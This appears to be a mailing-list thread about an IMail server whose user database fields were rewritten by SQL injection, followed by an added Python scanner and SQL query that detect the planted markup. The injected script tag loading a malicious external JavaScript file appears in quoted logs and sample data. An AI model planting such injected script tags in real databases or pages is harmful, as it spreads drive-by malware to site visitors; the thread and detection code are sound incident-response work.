Oops, I misread this.
You were hacked using SQL injection from the Web side of things. I'm
not sure what interface was hit, but it could be that webmail is
vulnerable to this. There's a bunch on SANS about these attacks:
http://www.google.com/search?sourceid=mozclient&ie=utf-8&oe=utf-8&q=sql+injection+site%3Aisc%2Esans%2Eorg
My guess is that this is Storm Botnet originated stuff. They hack sites
through a very common coding vulnerability in database connected
websites, insert redirection code to an infected site, and when
unsuspecting users visit the intended site, they get infected by means
of one of many vulnerabilities in desktop apps that they target.
Your logs are showing the aftermath of having the bad data in there.
This will continue to happen over and over again until you patch
whatever is vulnerable. You either have some sort of custom site set up
that has access to this particular database, or it was hacked straight
through IMail's Web interfaces. I would love to know which one.
Matt
Kevin Rogers wrote:
Thanks Matt. I use an external SQL Server for Imail and all my users
had their USERDIR and MAILADDR and TIMEZONE fields changed to include
that coldwop.com javascript (e.g., "someuser" had their USERDIR set to
"d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>").
I've fixed that. So what you're saying is that you don't think any
passwords have been compromised, but I've just been hit by the SQL
injector attacker?
Matt wrote:
This looks exactly like the SQL injection attacker from recent months
is trying to exploit a Postfix flaw by injecting into IMAP
interfaces. If this is causing you problems, it would seem that
IMail then isn't properly handling this bad data resulting in a
denial of service, though I strongly suspect that you are not
vulnerable otherwise. It could also be simply curious timing with
two different issues.
Matt
Kevin Rogers wrote:
Today our web mail application stopped working. Some users are
reporting IMAP issues as well. I've restarted all the services and
rebooted, but that hasn't helped. The error when entering web mail
is that there is an "illegal character in the path". When I checked
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail (d:\imail\RBG\myuser<script src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail (d:\imail\RBG\myuser<script src=http://www.coldwop.com/b.js></script>\main.mbx)
Coldwop.com apparently is a malicious site (my Trend Micro won't
even let me go there). Have I been hacked by them?
Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.
Kevin
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html
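Added example (not part of this thread and not Ipswitch code): a small Python scanner that takes the syslog lines quoted in the original post, finds the markup that the SQL injection planted inside the mailbox paths, and pulls out the affected user, the mailbox file IMail was trying to open and the script URL. It also includes the check that explains the "illegal character in the path" error: a USERDIR-style value that contains characters Windows never allows in a path component has been tampered with. The log lines are constructed from the post (with one clean line added as a negative case); the log format regex is an assumption based on those two lines only.

```python
import re
from dataclasses import dataclass
from typing import Iterator, Optional

# Constructed sample input: the two syslog lines quoted in the original post,
# rejoined onto single lines, plus one clean line as a negative case.
SAMPLE_LOG = r"""06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail (d:\imail\RBG\myuser<script src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail (d:\imail\RBG\myuser<script src=http://www.coldwop.com/b.js></script>\main.mbx)
06:21 12:19 SMTP-(46ed01d600006d41) ERR MyDomain.com read open fail (d:\imail\RBG\otheruser\main.mbx)
"""

# Characters that are never legal inside a Windows path component. The colon
# is left out because it is legal in the drive prefix (d:\...).
ILLEGAL_PATH_CHARS = set('<>"|?*')

# Assumed line shape, derived only from the two lines in the post:
# "<time> SMTP-(<hex session>) ERR <domain> read open fail (<path>)"
LINE_RE = re.compile(
    r"^(?P<time>\S+ \S+) SMTP-\((?P<session>[0-9a-f]+)\) ERR (?P<domain>\S+) "
    r"read open fail \((?P<path>.*)\)$"
)
# A <script ...>...</script> tag embedded in the path; the src= capture is the
# URL that victims' browsers would be sent to.
TAG_RE = re.compile(
    r"<script[^>]*src=[\"']?(?P<src>[^\s\"'>]+)[^>]*>.*?</script>",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Finding:
    session: str
    domain: str
    user: str               # path component that was tampered with
    mailbox: str            # the .mbx file IMail was trying to open
    injected: str           # the exact markup found inside the path
    script_src: Optional[str]


def illegal_chars(value: str) -> set:
    """Characters in a path or DB field that can never occur in a legal Windows
    path component. A non-empty result is the "illegal character in the path"
    condition from the post and is a cheap sanity check to run over USERDIR-style
    columns before their values are handed to the filesystem."""
    return {c for c in value if c in ILLEGAL_PATH_CHARS}


def inspect_path(path: str) -> Optional[tuple]:
    """Locate injected markup inside a mailbox path.
    Returns (user_component, mailbox_file, markup, src) or None if clean."""
    m = TAG_RE.search(path)
    if m is None:
        return None
    before = path[:m.start()]
    after = path[m.end():]
    user = before.rsplit("\\", 1)[-1]      # component the tag was appended to
    mailbox = after.lstrip("\\")           # what follows the tag: the .mbx name
    return user, mailbox, m.group(0), m.group("src")


def scan_log(text: str) -> Iterator[Finding]:
    """Yield one Finding per log line whose path carries injected markup."""
    for line in text.splitlines():
        lm = LINE_RE.match(line.strip())
        if lm is None:
            continue
        hit = inspect_path(lm.group("path"))
        if hit is None:
            continue
        user, mailbox, markup, src = hit
        yield Finding(lm.group("session"), lm.group("domain"), user, mailbox, markup, src)


def summarize(text: str) -> dict:
    """Aggregate the findings: which users need their DB rows repaired and
    which script URLs to block at the proxy/DNS while cleanup is under way."""
    findings = list(scan_log(text))
    return {
        "lines_flagged": len(findings),
        "users": sorted({f.user for f in findings}),
        "script_srcs": sorted({f.script_src for f in findings if f.script_src}),
    }


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.session}: user={f.user!r} mailbox={f.mailbox!r} src={f.script_src}")
    print(summarize(SAMPLE_LOG))
```

The same illegal-character test maps directly onto the database side: a query such as WHERE USERDIR LIKE '%<%' OR MAILADDR LIKE '%<%' OR TIMEZONE LIKE '%<%' over the IMail user table lists the rows that were rewritten, and re-running it after the web-side hole is closed tells you whether the injection is still coming back, which is the point Matt makes above about the damage recurring until the vulnerable interface is patched.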